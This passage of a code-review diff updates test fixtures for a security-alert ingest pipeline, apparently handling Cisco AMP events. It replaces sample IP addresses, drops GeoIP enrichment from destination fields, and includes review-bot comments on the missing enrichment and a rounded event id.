Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -405,7 +405,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", 
@@ -439,23 +439,8 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 15169,
- "organization": {
- "name": "Google LLC"
- }
- },
 "port": 443,
- "ip": "8.8.4.4"
+ "ip": "67.43.156.12"
 },
 "source": {
 "port": 55810,
@@ -481,8 +466,8 @@
 ],
 "ip": [
 "10.10.0.0",
- "8.8.4.4",
- "8.8.8.8",
+ "67.43.156.12",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
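Review bot: The removed `destination.geo` and `destination.as` blocks in the @@ -439,23 hunk are not replaced by the corresponding enrichment for the new address 67.43.156.12, so the expected output no longer asserts that the GeoIP/ASN lookup runs on `destination.ip`; the same removal appears in the @@ -550,23 and @@ -661,23 hunks. If the GeoIP database used by the pipeline tests covers this range, the expected file should be regenerated so the enrichment stays pinned; if it does not, picking a destination address from a covered range would keep the enrichment branch under test instead of only the raw-copy path. Whether the pipeline still applies a geoip processor to `destination.ip` cannot be confirmed from these hunks alone, so this is inferred from the dropped fields rather than the pipeline definition.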
@@ -495,8 +480,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070135066Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898046Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -514,7 +499,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { 
@@ -550,23 +535,8 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 15169,
- "organization": {
- "name": "Google LLC"
- }
- },
 "port": 443,
- "ip": "8.8.4.4"
+ "ip": "67.43.156.12"
 },
 "source": {
 "port": 55805,
@@ -592,8 +562,8 @@
 ],
 "ip": [
 "10.10.0.0",
- "8.8.4.4",
- "8.8.8.8",
+ "67.43.156.12",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -606,8 +576,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070137162Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898051200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -625,7 +595,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { 
@@ -661,23 +631,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.12" }, "source": { "port": 55809, @@ -703,8 +658,8 @@ ], "ip": [ "10.10.0.0", - "8.8.4.4", - "8.8.8.8", + "67.43.156.12", + "81.2.69.144", "10.10.10.10" ] }, 
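Review bot: The `destination.geo` and `destination.as` objects are dropped outright in this hunk (and again in the matching hunks at `@@ -772`, `@@ -883` and `@@ -994`) rather than re-rendered for the new `destination.ip` value `67.43.156.12`, so the regenerated expectation now pins the absence of GeoIP enrichment on the destination side. If the pipeline still runs a geoip processor on that field, the empty result most likely means the test stack's GeoIP database does not cover the new range, which is worth confirming rather than inheriting silently from a regenerated fixture; if the enrichment is meant to be gone, saying so in the commit description would spare the next reader the same question. Unrelated to this change but visible on the new side of the preceding `event.original` hunk: `\"id\":6180341055704007000` differs from `\"detection_id\":\"6180341055704006657\"` in its trailing digits, which looks like the 64-bit numeric id was rounded through a double when the sample was captured; the fixture carries that through unchanged, and it is only a concern if `id` is ever used as a correlation key instead of the string `detection_id`.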
@@ -717,8 +672,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070139211Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898057100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -736,7 +691,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { 
@@ -772,23 +727,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.12" }, "source": { "port": 55808, @@ -814,8 +754,8 @@ ], "ip": [ "10.10.0.0", - "8.8.4.4", - "8.8.8.8", + "67.43.156.12", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -828,8 +768,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070141304Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898062900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -847,7 +787,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { 
@@ -883,23 +823,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.12" }, "source": { "port": 55807, @@ -925,8 +850,8 @@ ], "ip": [ "10.10.0.0", - "8.8.4.4", - "8.8.8.8", + "67.43.156.12", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -939,8 +864,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070143371Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898068800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -958,7 +883,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { 
@@ -994,23 +919,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.12" }, "source": { "port": 55806, @@ -1036,8 +946,8 @@ ], "ip": [ "10.10.0.0", - "8.8.4.4", - "8.8.8.8", + "67.43.156.12", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1050,8 +960,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070145466Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898074700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection 